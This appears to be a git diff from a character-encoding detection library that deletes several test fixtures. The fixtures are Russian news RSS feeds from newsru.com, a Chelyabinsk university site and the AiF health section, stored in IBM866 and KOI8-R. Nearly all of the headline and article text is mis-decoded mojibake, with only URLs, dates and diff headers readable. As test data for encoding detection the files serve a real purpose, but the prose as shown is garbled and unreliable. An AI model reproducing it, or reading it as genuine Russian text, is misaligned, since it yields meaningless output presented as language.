¨§ ¬¨««¨®­®¢ ×®¬¯למג¥א®¢ ¯®₪ ד¯א ¢«¥­¨¥¬ ‘ Windows ¬®¦¥ג ¡כגל  ג ×®¢ ­ ¯אן¬® ב¥©ח ב, ¯¨ט¥ג £ §¥ג  Financial Times. €ג ×  ¯א®¨בו®₪¨ג ¯דג¥¬ ¢­¥ב¥­¨ן ¢א¥₪®­®ב­®£® ×®₪  ¢ ®¡כח­דמ × אג¨­×ד. ג® ¬­®£®×א ג­® ד¢¥«¨ח¨¢ ¥ג ®¯ ב­®בגל § א ¦¥­¨ן. א®¬¥ ג®£®, Microsoft ¯®×  ­¥ ¢כ¯דבג¨«  ¨ב¯א ¢«¥­¨¥, § ×אכ¢ מי¥¥ "₪כאד". - ‚ ¬¨א¥ - Tue, 3 Jan 2006 12:25:00 +0300 - - - - - - - Die Presse: דג¨­ - ¢« בג¥«¨­ £®«ד¡®£® ®£­ן - http://www.newsru.com/russia/03jan2006/putingas.html - "ƒ §¯א®¬" &#8211; םג® £« ¢­®¥ ®אד¦¨¥ דג¨­  ¢ ¡®אל¡¥ §  ¢«¨ן­¨¥ ¨ ¢« בגל. ‘ ג¥ו ¯®א × × "ƒ §¯א®¬" ¯א¨®בג ­®¢¨« ב­ ¡¦¥­¨¥ “×א ¨­כ ¯א¨א®₪­כ¬ £ §®¬, ¦¨§­ל ¢ ז¥­גא «ל­®© ₪¨ב¯¥גח¥אב×®© ¬®­®¯®«¨¨, ­¥ב¬®גאן ­  ­®¢®£®₪­¨¥ ¯א §₪­¨×¨, ¡ל¥ג ׫מח®¬. - ‚ ®בב¨¨ - Tue, 3 Jan 2006 12:13:00 +0300 - - - - - - - ˆ§ ¯ד­×ג  ®¡¬¥­  ¢ «מגכ ¢ ®ב×¢¥ ¯®ו¨י¥­® 35 גכבןח ₪®«« א®¢ - http://www.newsru.com/crime/03jan2006/grab.html - „¢®¥ ­¥¨§¢¥בג­כו ¢¥ח¥א®¬ ¢ ¯®­¥₪¥«ל­¨× ב®¢¥אט¨«¨ א §¡®©­®¥ ­ ¯ ₪¥­¨¥ ­  ¯ד­×ג ®¡¬¥­  ¢ «מגכ ­  ®א®¢ב×®¬ ט®בב¥.  בב¨א  ד₪ א¨«¨ ¯® £®«®¢¥ ¨ ב¢ן§ «¨. - א¨¬¨­ « - Tue, 3 Jan 2006 12:03:00 +0300 - - - - - ‚ ‘˜€ ×®ג ב¯ ב ¦¨§­ל ו®§ן¨­ד, ¯®§¢®­¨¢ ¯® ג¥«¥ה®­ד ¢ ב«ד¦¡ד 911 - http://www.newsru.com/world/03jan2006/cat.html - 50 «¥ג­¨© ƒ אא¨ ®ט¥©§®­ ד¯ « ב ¨­¢ «¨₪­®£® ×א¥ב«  ¨ ­¥ ¬®£ ¯®₪­ןגלבן ¨§-§  ב«דח¨¢ט¥£®בן ¬¨×א®¨­בד«לג . •®§ן¨­ ¦¨¢®ג­®£® ¯א¨§­ «בן, חג® ב¯¥ז¨ «ל­® ¯כג «בן ®¡דח¨גל ×®ג  ­ ¦¨¬ גל ­  ג¥«¥ה®­¥ ×­®¯×ד ¯אן¬®£® §¢®­×  ¢ ב«ד¦¡ד 911, ­® ­¨× × ­¥ א בבח¨גכ¢ «, חג® ×®ג ₪¥©בג¢¨ג¥«ל­® ב¬®¦¥ג םג® ב₪¥« גל. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 11:42:00 +0300 - - - - - - - - - ¥¬¥ז× ן ¯ א  § ¬דא®¢ «  ¢ ¡¥ג®­ ₪¢דו ₪¥ג¥© - http://www.newsru.com/crime/03jan2006/germanz.html - ‘ ¯א¨§­ ­¨¥¬ ¢ ¯א ¢®®וא ­¨ג¥«ל­כ¥ ®א£ ­כ ן¢¨«בן ¬ד¦ח¨­ . ­ ב®®¡י¨«, חג® ¢ ב¥א¥₪¨­¥ 1990-ו £®₪®¢ ®­ § ו®א®­¨« ₪¢דו ₪¥ג¥© ¢ ¯®₪¢ «¥ ₪®¬ . ’¥«  ₪¥ג¥© ¡כ«¨ ב¯אןג ­כ ¢ ¬דב®א­כ© ¯ ×¥ג ¨ § ¬דא®¢ ­כ. - א¨¬¨­ « - Tue, 3 Jan 2006 11:24:00 +0300 - - - - - ˆ„ ®¡¢¨­ן¥ג ’¡¨«¨ב¨ ¢ א ב×אדח¨¢ ­¨¨  ­ג¨א®בב¨©ב×®© × ¬¯ ­¨¨ - http://www.newsru.com/russia/03jan2006/gruz.html - ’¡¨«¨ב¨ א ב×אדח¨¢ ¥ג  ­ג¨א®בב¨©ב×דמ × ¬¯ ­¨מ. ƒ®¢®א¨גל ® בא®× ו ¯®₪¯¨ב ­¨ן א®בב¨©ב×®-£אד§¨­ב×®£® „®£®¢®א  ® ₪אד¦¡¥ ¬®¦­® ג®«ל×® ¯®ב«¥ ­®א¬ «¨§ ז¨¨  ג¬®בה¥אכ ¢ ₪¢דבג®א®­­¨ו ®ג­®ט¥­¨ןו, ­ בג ¨¢ ¥ג ˆ„. - ‚ ®בב¨¨ - Tue, 3 Jan 2006 11:04:00 +0300 - - - - - - -  בג¥ג ח¨ב«® ¯®£¨¡ט¨ו ¢ א¥§ד«לג ג¥ ®¡¢ «  ×אכט¨ × ג×  ¢  ¢ א¨¨ - http://www.newsru.com/world/03jan2006/de.html - ® ¬¥א¥ ¯א®₪®«¦¥­¨ן ב¯ ב ג¥«ל­כו א ¡®ג ­  ¬¥בג¥ ®¡אדט¥­¨ן ×אכט¨ ב¯®אג×®¬¯«¥×ב  ¢ ¬¥בג¥ח×¥  ₪  ©ו¥­ו «ל ב¯ ב ג¥«¨ ¨§¢«¥× מג ¨§-¯®₪ § ¢ «®¢ ¢ב¥ ­®¢כ¥ ג¥« . ® ¯®ב«¥₪­¨¬ ₪ ­­כ¬, ח¨ב«® ¯®£¨¡ט¨ו ₪®בג¨£«® 15 ח¥«®¢¥×. ®«¥¥ 30 ח¥«®¢¥× ¯®«דח¨«¨ א ­¥­¨ן. —¥ג¢¥א® בח¨ג מגבן ¯א®¯ ¢ט¨¬¨ ¡¥§ ¢¥בג¨. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 10:52:00 +0300 - - - - - - - - - - - - - - - - - - - - „¢®¥ ¢®¥­­®ב«ד¦ י¨ו ¯®£¨¡«¨ ­  ¢ —¥ח­¥ - http://www.newsru.com/russia/03jan2006/chechen.html - ®₪¢¥א£בן ®¡בגא¥«ד ­  ®×א ¨­¥ א ©ז¥­גא  דאח «®©. ¥¨§¢¥בג­כ¥ «¨ז  ¨§  ¢ג®¬ ג¨ח¥ב×®£® ®אד¦¨ן ®¡בגא¥«ן«¨ ­ אן₪ ¢®¥­­®ב«ד¦ י¨ו ‚­דגא¥­­¨ו ¢®©ב×, ®בדי¥בג¢«ן¢ט¨© ₪®ב¬®גא  ¢ג®גא ­ב¯®אג . - ‚ ®בב¨¨ - Tue, 3 Jan 2006 10:34:00 +0300 - - - - - ‚§אכ¢ ­  ט וג¥ ¢ ‘˜€: 13 £®א­ן×®¢ ¯א®¯ «¨ ¡¥§ ¢¥בג¨ - http://www.newsru.com/world/03jan2006/mine.html - ‚§אכ¢ ¯א®¨§®ט¥« ­  ד£®«ל­®© ט וג¥ ¢ ‡ ¯ ₪­®© ‚¨א₪¦¨­¨¨. ‘¯ ב ג¥«ן¬ ¯®×  ­¥ ד₪ ¥גבן דבג ­®¢¨גל ×®­ג ×ג ב £®א­ן× ¬¨, ×®ג®אכ¥ ¯א¥₪¯®«®¦¨ג¥«ל­® ¡«®×¨א®¢ ­כ ­  £«ד¡¨­¥ ¢ 80 ¬¥גא®¢. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 10:21:00 +0300 - - - - - - - - "ƒ §¯א®¬": “×א ¨­  ¯א®₪®«¦ ¥ג ¢®א®¢ גל, ­® ¯®בג ¢× ¬ םג® ­¥ ¯®¬¥ט ¥ג - http://www.newsru.com/finance/03jan2006/gas.html - א¥§¨₪¥­ג “×א ¨­כ י¥­×® דג¢¥א¦₪ ¥ג, חג® £ §®גא ­ב¯®אג­ ן ב¨בג¥¬  בגא ­כ ®¡¥ב¯¥ח¨¢ ¥ג גא ­§¨ג. "ƒ §¯א®¬" ®¡¥י ¥ג ¥¢א®¯¥©בר¬ ¯®גא¥¡¨ג¥«ן¬ ×®¬¯¥­ב ז¨¨, דג¢¥א¦₪ ן, חג® “×א ¨­  ¯א®₪®«¦ ¥ג ­¥ב ­×ז¨®­¨א®¢ ­­® ®ג¡¨א גל א®בב¨©בר© £ §. - ×®­®¬¨×  - Tue, 3 Jan 2006 10:11:00 +0300 - - - - - - - - - ‘¯¥ז®¯¥א ז¨ן ¢ „ £¥בג ­¥: ד¡¨גכ 5 ¡®¥¢¨×®¢ ¨ 2 ¬¨«¨ז¨®­¥א  - http://www.newsru.com/russia/03jan2006/oper.html - ‚ ו®₪¥ ¬ בטג ¡­®© ב¯¥ז®¯¥א ז¨¨ ¯® ¡«®×¨א®¢ ­¨מ £אד¯¯כ ¡®¥¢¨×®¢ ¢ “­זד×ד«לב×®¬ א ©®­¥ „ £¥בג ­  א ­¥­¨ן ¯®«דח¨«¨ 7 ב®גאד₪­¨×®¢ ¯א ¢®®וא ­¨ג¥«ל­כו ®א£ ­®¢, ₪¢®¥ ¨§ ­¨ו ב×®­ח «¨בל. ®ג¥א¨ ¡®¥¢¨×®¢ ®ז¥­¨¢ מגבן ¢ ¯ןגל ד¡¨גכו. €×ג¨¢­ ן ה §  ב¯¥ז®¯¥א ז¨¨ ב ­ בגד¯«¥­¨¥¬ ג¥¬­®גכ ¯א¨®בג ­®¢«¥­ . - ‚ ®בב¨¨ - Tue, 3 Jan 2006 09:48:00 +0300 - - - - - - - - 2050 £®₪ד ¢ ¬¨א¥ ¯®ן¢ןגבן ­®¢כ¥ ב¢¥או₪¥א¦ ¢כ. ®בב¨ן ¯א®₪®«¦¨ג ¯®בג¥¯¥­­® ¢כ¬¨א גל - http://www.newsru.com/world/03jan2006/future.html - ¨ג © × 2050 £®₪ד בג ­¥ג ב ¬®© ¬®י­®© ם×®­®¬¨ח¥ב×®© ₪¥א¦ ¢®© ¯« ­¥גכ, ˆ­₪¨ן - ¬¨א®¢כ¬ «¨₪¥א®¬ ¯® ח¨ב«¥­­®בג¨ ­ ב¥«¥­¨ן, ג®£₪  × × ®בב¨ן ב ד¬¥­לט¨¢ט¨¬בן ­ ב¥«¥­¨¥¬ ¢®©₪¥ג ¢ ₪¥בןג×ד ¯® ¬®י¨ ם×®­®¬¨×¨. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 09:42:00 +0300 - - - - - - -  ¢®₪­¥­¨¥ ¢ ˆ­₪®­¥§¨¨: ח¨ב«® ¯®£¨¡ט¨ו ¯א¥¢כב¨«® 50 ח¥«®¢¥× - http://www.newsru.com/world/03jan2006/flood.html - ˆ§-§  ¯א®₪®«¦ ¢ט¨ובן ₪¢  ₪­ן ¯®₪אן₪ ₪®¦₪¥© ¢ א ©®­¥  ­ג¨ ¯א®¨§®ט¥« £¨£ ­גבר© ®¯®«§¥­ל ¨ ¢כט«  ¨§ ¡¥א¥£®¢ א¥× , ¢ א¥§ד«לג ג¥ ח¥£® ¬®י­כ¥ ¯®ג®×¨ ¢®₪כ ¨ £אן§¨ ®¡אדט¨«¨בל ­  ­¥ב×®«ל×® ¡«¨§«¥¦ י¨ו ₪¥א¥¢¥­ל. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 09:26:00 +0300 - - - - - - - - ‚ ®ב×¢¥ ¢® ¢ג®א­¨× ¡ד₪¥ג ¬®א®§­® - http://www.newsru.com/russia/03jan2006/pogoda.html - ‚ בג®«¨ז¥ בג®«¡¨× ג¥א¬®¬¥גא  ­¥ ®¯דבג¨גבן ­¨¦¥ ®ג¬¥גר 1-3 £א ₪דב  ¬®א®§ ,   ¯® ®¡« בג¨ - 1-6 £א ₪דב®¢. ‚¥ג¥א ¡ד₪¥ג מ£®-¢®בג®ח­כ¬, ד¬¥א¥­­כ¬ ¨ ­¥ ¯א¥¢כב¨ג 3-8 ¬¥גא®¢ ¢ ב¥×ד­₪ד. - ‚ ®בב¨¨ - Tue, 3 Jan 2006 09:15:00 +0300 - - - - - diff --git a/chardet/tests/IBM866/susu.ac.ru.xml b/chardet/tests/IBM866/susu.ac.ru.xml deleted file mode 100644 index af0aad2..0000000 --- a/chardet/tests/IBM866/susu.ac.ru.xml +++ /dev/null @@ -1,32 +0,0 @@ - - - - -ru -press@susu.ac.ru (–¥­גא ¨­ה®א¬ ז¨¨ ¨ ב¢ן§¥© ב ®¡י¥בג¢¥­­®בגלמ) -webmaster@urc.ac.ru (ג₪¥« £«®¡ «ל­כו ב¥ג¥¢כו ג¥ו­®«®£¨©) -http://susu.ac.ru/gerb2.gif -¦­®-“א «לבר© £®בד₪ אבג¢¥­­כ© ד­¨¢¥אב¨ג¥ג -http://susu.ac.ru/ -®¢®בג¨ “אƒ“ -http://susu.ac.ru/ru/news/ -®¢®בג¨ ¦­®-“א «לב×®£® £®בד₪ אבג¢¥­­®£® ד­¨¢¥אב¨ג¥ג  (—¥«ן¡¨­ב×) -~220 V, 50 Hz -1995-2004 ¦­®-“א «לבר© £®בד₪ אבג¢¥­­כ© ד­¨¢¥אב¨ג¥ג -Thu, 10 Mar 2005 15:45:45 +0500 - -Thu, 29 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1329 - £א ¦₪¥­כ ¯®¡¥₪¨ג¥«¨ ×®­×דאב  ב ©ג®¢ -29 ₪¥× ¡אן ¢ § «¥ § ב¥₪ ­¨© “חס­®£® ב®¢¥ג  ¦­®-“א «לב×®£® £®בד₪ אבג¢¥­­®£® ב®¢¥ג  ב®בג®ן« בל ז¥א¥¬®­¨ן ­ £א ¦₪¥­¨ן ¯®¡¥₪¨ג¥«¥© ×®­×דאב  ב ©ג®¢ ָ‚¥¡-בגא®¨ג¥«לבג¢®. ‘₪¥« © ב ¬. - -‚ ×®­×דאב¥ ¯א¨­ן«¨ דח בג¨¥ ®×®«® 70 ב ©ג®¢, ב®§₪ ­­כו בגד₪¥­ג ¬¨, ¯א¥¯®₪ ¢ ג¥«ן¬¨... -29 ₪¥× ¡אן ¢ § «¥ § ב¥₪ ­¨© “חס­®£® ב®¢¥ג  ¦­®-“א «לב×®£® £®בד₪ אבג¢¥­­®£® ב®¢¥ג  ב®בג®ן« בל ז¥א¥¬®­¨ן ­ £א ¦₪¥­¨ן ¯®¡¥₪¨ג¥«¥© <a href=""http://konkurs.susu.ru/"">×®­×דאב  ב ©ג®¢ ָ‚¥¡-בגא®¨ג¥«לבג¢®. ‘₪¥« © ב ¬</a>. - -‚ ×®­×דאב¥ ¯א¨­ן«¨ דח בג¨¥ ®×®«® 70 ב ©ג®¢, ב®§₪ ­­כו בגד₪¥­ג ¬¨, ¯א¥¯®₪ ¢ ג¥«ן¬¨ ¨ ב®גאד₪­¨× ¬¨ “אƒ“. - -א¥₪ב¥₪ ג¥«ל ¦מא¨, ¯א®א¥×ג®א ¯® דח¥¡­®© א ¡®ג¥ €«¥×ב ­₪א ˆ¢ ­®¢¨ח ‘¨₪®א®¢ ¢אדח¨« ­ £א ₪כ ¯®¡¥₪¨ג¥«ן¬: -<ul><li>“ח¥¡­כ¥ ב ©גכ<ol><li><a href=""http://www.tipilp.susu.ac.ru/""> ה¥₪א  ’¥ו­®«®£¨¨ ¨ ¯א®¥×ג¨א®¢ ­¨ן ¨§₪¥«¨© «ס£×®© ¯א®¬כט«¥­­®בג¨</a></li><li><a href=""http://model.exponenta.ru/"">Model.Exponenta.Ru \ No newline at end of file diff --git a/chardet/tests/KOI8-R/aif.ru.health.xml b/chardet/tests/KOI8-R/aif.ru.health.xml deleted file mode 100644 index 48fb158..0000000 --- a/chardet/tests/KOI8-R/aif.ru.health.xml +++ /dev/null @@ -1,131 +0,0 @@ - - - - - - www.AIF.ru - י־װֵׂ־ֵװ-׳ֵׂ׃ֹׁ ֱִֹ־ֹׁ "בֹז תִֿֿׂ׳״ֵ" - http://www.aif.ru/online/health - - - בֹז תִֿֿׂ׳״ֵ - http://www.aif.ru/data/mags/health/button.gif - http://www.aif.ru/online/health - 88 - 31 - - - - כֱֻ ׀ֵֵׂײֹװ״ ־ֿ׳ִַֿֿ־ְְ ־ֿ״ - http://www.aif.ru/online/health/592/11_01 - - מֱ׳ֵׂ־ֵֿ, ִֵֹ־׃װ׳ֵ־־ֵֿ, ׳ֿ װֿ ׃ִֵַֿ־ׁ ֽֿײ־ֿ ׳ֵֹׂװ״ ֲֵַֿֿ׳ֿֿׂ־ֿ, װֱֻ װֿ ׳ װֿ, װֿ מֿ׳ ִַֿ ֱֲֿׁװֵּ״־ֿ ־ֱ׃װױ׀ֹװ. מֵ׃ֽֿװׁׂ ־ֹ ־ֱ װֿ! װֿ ־ֵ ׀ֿׂ׃װֿ ִֵֵֿׂ־ֿ ׀ֱִׂ־ֹֻ, װֿ - ׳ֱֵָ! ב ׳ֵָֹ ׳ ײֹ־ֹ ׀ֹׂ־ׁװֿ ֿװֱֵֽװ״. ןװֱֵֽװ״ ֹֻֿֿׂ ֹ ִֵ־״ֱֻ ֱִֻ ִ׳ֱ-װֹׂ... י ׳ֵֽ׃װֿ ׀ֿׂ׳ֱֱֵַָּֽֿ "־ֿ׳ַֿֿ ׃ֱ׃װ״ׁ" ֹ "־ֿ׳ַֿֿ ִֿֿׂ׳״ׁ" ׀ֱִׂ־ֿ׳ֱ־ֵֹ מֿ׳ַֿֿ ֱִַֿ ׀ֹׂ־ֿ׃ֹװ ֲֹּֿ ־ֿ׳ֵ ֲֹֻּֿׁ, ֲֹּֿ ֲֿֿ׃װֵׁׂװ ׃װֱֵׂ. הֱֲ ׀ֿ׃װֱֱׂװ״׃ׁ ֲֵֹײֱװ״ ׀ֲִֿֿ־ַֿֿ ֶֹ־ֱֱּ ְֲַֹּֽֿֿ ׀ֱִׂ־ֱֹֻ, ׀ֹׂ׳ִֵױ ־ֵ׃ֻּֿ״ֻֿ "׀ֱִׂ־ֹ־ָ" ׀ֱׂ׳ֹּ ֱ׃װּֿ״־ֿ ֲֵֿ׀ֱ׃־ֿ׃װֹ. - - - יִֹװֵ ׳ ֱֲ־ְ! - http://www.aif.ru/online/health/592/03_01 - - װֿ ֽֿײ־ֿ ֱִֵּװ״ ׳ ֿ׀ֱָֹֻּ, ׳ ֵֵֻֽ ׃ ֲֵֵֿׂ׳ֹֽ ֹּ׃װ״ֹֽׁ ֹֹּ ׃ֵ־ֽֿ. נֱֹׂװ״׃ׁ ֽֿײ־ֿ, ֱִײֵ ֱׂ׳ֹ׃״ ׳ ׀ֵ׃ֻֿ. כֱֻ ׀ֱׂ׳ֹּ״־ֿ ִָֹֿװ״ ׳ ֱֲ־ְ, ־ֱֽ ֱׂ׃׃ֱֻ׳ֱֵװ ׳ֱׂ-ֶֹֹֿװֱֵׂ׀ֵ׳װ ֿװִֵֵּ־ֹׁ ֱֲּ״־ֵַֹֹּֿֿ ֳִֵֹֹֽ־׃ַֻֿֿ ֳֵ־װֱׂ "חױװֱ-כֹּ־ֹֻ" אֹּׁ בעפבםןמןקב. - - - ן ֵֽ ֱׂ׃׃ֱֻײֵװ ֱֳֵֹֻׁׂ ֱֽ־װױ - http://www.aif.ru/online/health/592/05_01 - - עֱֳֵֹֻׁ םֱ־װױ - װֿ װױֲֵֻׂױֹּ־ֿ׳ֱׁ ׀ֱֲֿׂ. הּׁ ֱֻֻֿ ֳֵֹּ ֿ־ֱ ֹ־ֱֱּ״־ֿ ׀ִֵׂ־ֱ־ֱֱֱּ׃״? "עֱֳֵֹֻׁ םֱ־װױ - װֿ ֿװ׳ֵװ ֵֻּװֿ־ַֿֿ ֹֽֽױ־ֹװֵװֱ ֱֻֻ ַֹ׀ֵׂױ׳׃װ׳ֹװֵּ״־ֿ׃װֹ ֱִֵֵּֽ־־ַֿֿ װֹ׀ֱ ־ֱ ׃ֵ־׃ְֱֲֳֹֹֹֹּ ֱַֿׂ־ֱֹֽ ֱֲֹֻֻֽֿװֵֹֹֽׁׂ װױֲֵֻׂױֱֵּ. נִֵׂ־ֱ־ֱֵ־ֱ ֿ־ֱ ִּׁ ׳ׁ׳ֵּ־ֹׁ ׳ ֱַֿׂ־ֵֹֽ ׳ֲֿױִֹװֵּׁ װױֲֵֻׂױֱֵּ". (כֹֽֿװֵװ ׀ֿ ֵֻּװֿ־ֽֿױ ֹֽֽױ־ֹװֵװױ ֹ ױ׃װֹֿ׳ֿ׃װֹ ֻ ֹ־ֳֵֶֹֹֻ, קןת, 1965, 1970 ַַ.) נֵׂ׳ֱׁ ׳׃װֱֵׂ ׃ ֱֲֹֻֻֽֿװֵֹֹֽׁׂ װױֲֵֻׂױֱֵּ ׳ עֿ׃׃ֹֹ ־ֱ׳ׁ׳ֱֵװ׃ׁ ֹ׃ֻױ׃׃װ׳ֵ־־ֿ (!) ֹ ֱֽ׃׃ֿ׳ֿ ׳ ֱִִָֽֿֿׂ. - - - ף 3 ִֿ 7 ֵּװ. עֱ׃װֹֽ ֵ׳ְֵּׂױ - http://www.aif.ru/online/health/592/06_01 - - "םֵֿ ִֵ׳ֵֻֿ ׃ֻֿֿׂ 5 ֵּװ. ו ױײֵ ֱֲ־װֹֹֻ ־ֿ׃ֹװ״ ֵָֿװ׃ׁ, ־ֿ ָ׳ֿ׃װֹֹֻ ֱִֵּװ״ ־ֵ ֹ ֵַֿ. נִֿ׃ֱֻײֹװֵ, ׳ ֵֽ ֽֿײֵװ ֲװ״ ׀ֹֹׂ־ֱ ֹ ֱֵֹֻֻ ׃ִֵׂ׃װ׳ֱ ַֽֿױװ ׀ֽֿֿ״?" -ם. ם ֵ ־ ֹ ֻ ֿ ׳ ֱ, כֿ׃װֱֽֿׂ - - - ף 7 ִֿ 12 ֵּװ. טִֹּּֿֿ״־ֹֻ ־ֱ ְֻּ - http://www.aif.ru/online/health/592/06_02 - - "םֿײ־ֿ ֹּ ֿ׀ִֵֵֹּׂװ״, ֹ׃װֹ־־ֵֿ ױ ֲֵֵׂ־ֱֻ ֿײֵֹׂ־ֵֹ ֹֹּ ֿ־ ׀ֱִֵֵֵֵׂװ?" -פ. ב ׳ ֵ ׂ ֹ ־ ֱ, וֱֻװֵֹׂ־ֲױַׂ - - - ף 12 ִֿ 16 ֵּװ. ן׀ֱ׃־ֱׁ ֱִֽֿ - http://www.aif.ru/online/health/592/06_03 - - "ףֱֻײֹװֵ, ־ֱ׃ֻּֿ״ֻֿ ֿ׀ֱ׃־ֿ ִָֹֿװ״ ֹֽֿ ׃ ֿװֻׂװֽ ײֹ׳ֿװֽֿ. םֿׁ ִֿ״ ַֿ׳ֹֿׂװ, װֿ ֿ־ֱ ׳׃ֵ ׀ֹֻׂׂ׳ֱֵװ ֻױׂװֻֿ, ־ֿ ׳׃ֵ ֱׂ׳־ֿ ײֵ ִָּֿֿ־ֿ... הֱֱֻֿװ״ ֵ װֿ-ֲֹּֿ ־ֵ׳ֽֿֿײ־ֿ." -ק. ע., פּֿ״ׁװװֹ - - - נֱׂ׳ֱֹּ ִּׁ ײֵּױֱִֻ - http://www.aif.ru/online/health/592/07_01 - - ם־ֵַֹֿ ׀ִֵֵֹֹֿׂ׃ֹֻ ׃װְֱֱִׂװ ֿװ ־ֵ׃׳ֱֵׂ־ֹׁ ײֵּױֱִֻ, ׃ֿ׀ֿׂ׳ֿײְֱִֵַֿ׃ׁ ֲֵּֿ׳ֹֽ ֿױֵ־ֹֹֽׁ. נֹֹׂ־ֱ װַֿֿ ְֱֱֵֻּװ׃ׁ ־ֵ װּֿ״ֻֿ ׳ װֽֿ, װֿ ְִֹּ ִֵׁװ ־ֵ װֿ, װֿ ־ֱִֿ, ־ֿ ֹ ־ֵ װֱֻ, ֱֻֻ ־ֱִֿ, ֹ ֲּֿ״ֵ, ֵֽ ־ֱִֿ. ן׃ֲֵֿ־־ֿ ֱ׃װֿ װֱֱֻׁ ׀ֱֲֵּֽֿׂ ׳ֿ־ֱֵֹֻװ ׀ֿ׃ֵּ ׀ֱִׂ־ֹ־ָ ֱ׃װֹּֿ. ‏װֲֿ ־ֵ ִֿ׳ִֹֿװ״ ײֵּױִֻֿ ִֿ װֱַֻֿֿ ׃ֿ׃װֿׁ־ֹׁ, ׀ֽֿ־ֹװֵ ־ֵ׃ֻּֿ״ֻֿ ׀ֿׂ׳ֵֵׂ־־ָ ׳ֵֵֽׂ־ֵֽ ׀ֱׂ׳ֹּ. - - - מֱ׃װױ׀ֵּ־ֵֹ ־ֱ ֱ־ַֹ־ױ - http://www.aif.ru/online/health/592/08_01 - - כ ִֿ־ֽֿױ ֹ ־ֱֲֵֵֹּֿ ֱׂ׃׀ֿׂ׃װֱׂ־ֵ־־ָ ׀ֿׂ׃װױִ־ָ ֱֲֵּֿ׳ֱ־ֹ ֿװ־ֿ׃ֹװ׃ׁ ֱ־ַֹ־ֱ, ֹֹּ ֿ׃װׂ װֿ־ֹֹּּװ. װֽֿױ ֿ׃װֽֿׂױ ֹ־ֳֵֶֹֻֿ־־ֽֿױ ֱֲֵּֿ׳ֱ־ְֹ ׃ ׀ֱֿׂײֵ־ֵֹֽ ֹֽ־ֱִֹּ־ (ֱַּ־ִ) ׀ִֿ׳ֵׂײֵ־ ֱֻֻ ִֵװֹ, װֱֻ ֹ ׳ֿׂ׃ֵּ. ‏ֱֵ ׳׃ֵַֿ ֱ־ַֹ־ֱ ׳ֿ־ֱֵֹֻװ ֹ-ֱ ׀ֱֵֵָּֿׂײִֵ־ֹׁ װֱֵּ ֹֹּ ֿװִֵּ״־ָ ֵַֿ ֱ׃װֵ, ֿ׃ֲֵֿ־־ֿ ־ַֿ, ־ֱ ֶֿ־ֵ ׃־ֹײֵ־ֹׁ ֹֽֽױ־־ֿ ֱֹװ ֱַֿׂ־ֱֹֽ, ׀ֹׂ ־ֱֵֹֻּֿׂ־ֽֿ ׀ֹװֱ־ֹֹ, ָֿׂ־ֵֹ׃ֻֽֿ ׃װֵׂ׃׃ֵ, ׀ֵֵׂױװֵּֽֿ־ֹֹ, ־ִֵֿ׃׀ֱ־ֹֹ. - - - ק־ֱֹֽ־ֵֹ ־ֱ ׀ֿ׳ֿ־ֿ־ֹֻ - http://www.aif.ru/online/health/592/10_01 - - ן׃װֵָֿֿ־ִֿׂ - ִֿ׳ּֿ״־ֿ ֱׂ׃׀ֿׂ׃װֱׂ־ֵ־־ֵֿ ֱֲֵּֿ׳ֱ־ֵֹ, ֻֿװֵֿֿׂ ֱׂ׳ֹ׳ֱֵװ׃ׁ ױ ְִֵּ ְֲַּֿֿ ׳ֱֿׂ׃װֱ. נֵֹֽׂ ׳ ׀ֿ׃ִֵּ־ֵֵ ׳ֵֽׁׂ ׳ ׃׳ֹׁ ׃ ֱּֽֿ׀ִֿ׳ֹײ־ֽ ֱֲֽֿֿׂ ײֹ־ֹ ֹ ֽ־ֱַֿֿ׃ֿ׳ֽ ׃ִֵֹ־ֵֹֽ ֱ ֻֽֿ׀״ְװֵֽֿׂ ֿ־ ֱֵֽװ־ֿ ׀ִֵּּֽֿֿֿ. כֱֻ ׀ֱֱֹֻּֿ ֹ׃׃ִֵּֿ׳ֱ־ֹׁ, ׀ֿׂ׳ִֵֵ־־ֵ ׳ י־׃װֹװױװֵ ־ֱװױֿׂ׀ֱװֹֹ, ׳ ׀ֱֶֹֻּֿׂװֵֹֻ ֿ׃װֵָֿֿ־ֱִֿׂ ־ֱֲֹּֿ״ֹ ֵֶֶֻװ ֱֻֿ׳ְֱװ ֱֽ׃׃ֱײ, ֲֵֵּ־ֱׁ ַֹֽ־ֱ׃װֱֹֻ, ׃ֱֽֿ׳װׁײֵ־ֵֹ ֵֹ ֹ ׀ֿ׳ֿ־ֿ־ֱֹֻ, ִֵֹװֱ ֹ ֶֹװֿװֱֵׂ׀ֹׁ. - - - מֵ ׃ֹֻּֽֿ ֹּ ײֹׂ־ֿ? - http://www.aif.ru/online/health/592/11_02 - - קֱֲֹׁׂ ־ֱֲֵֵֹּֿ ׀ִִֵָֹֿֿׁ ִּׁ ׳ֱ׃ ׳ֱֱֹׂ־װ ֿװ׳ֵװֿ׳ ־ֱ ֱֻײִ ֹ ׳ֿ׀ֿׂ׃ֿ׳ װַֿֿ װֵ׃װֱ, ׳ ׃ֽֿײֵװֵ ׳ ִֿ׃װֱװֿ־ֿ ׃װֵ׀ֵ־ֹ ֲֵֻֿװֹ׳־ֿ ֿ׀ִֵֵֹּׂװ״ - ֱ ־ֵ "׀ֱֲֵֵֹׂׂ׳ֱֵװֵ" ֹּ ׳ ׳ ׃׳ֵֽֿ ׀ֵֹ׳ֽֿ ֱֳֹֿׂ־ֵ ׃ ײֱֹֹֽׂ? - - - יֵֹּֽ ֹּ ֱַֹֻּּֽֿֿ? - http://www.aif.ru/online/health/592/12_01 - - "כֱֻ ֹ ִּׁ ֵַֿ ְִֹּ ׃ְֱִֿװ ׃ֲֵֵ ֲֵּֿ־ֹ ֹ ׀ֲֵּֽֿׂ? כֱֻ ׀ֽֿֿ״ ְִּֽׁ ֵֹֽ־ֹװ״ ׃׳ְֿ ײֹ־״? י ֱֻֻ ׃ֱִֵּװ״ ײֹ־״ ֵּֿ׳ֱֵֻ ִֿֿׂ׳ֿ, ׃ֹּ״־ֿ ֹ ׃ֱ׃װֹּ׳ֿ?" נֱֻׂװֹֻױְֹ ׀׃ָֹֿװֱֵׂ׀ֵ׳װ, ׀׃ַָֹּֿֿ ֹ ֵַֽֿֿ׀ֱװ קֱֵֹּׂ ףימולרמיכןק ׀װֱֵװ׃ׁ ־ֱװֹ ֿװ׳ֵװ ־ֱ װֹ ׳ֿ׀ֿׂ׃... ףִֵַֿ־ׁ ֽ 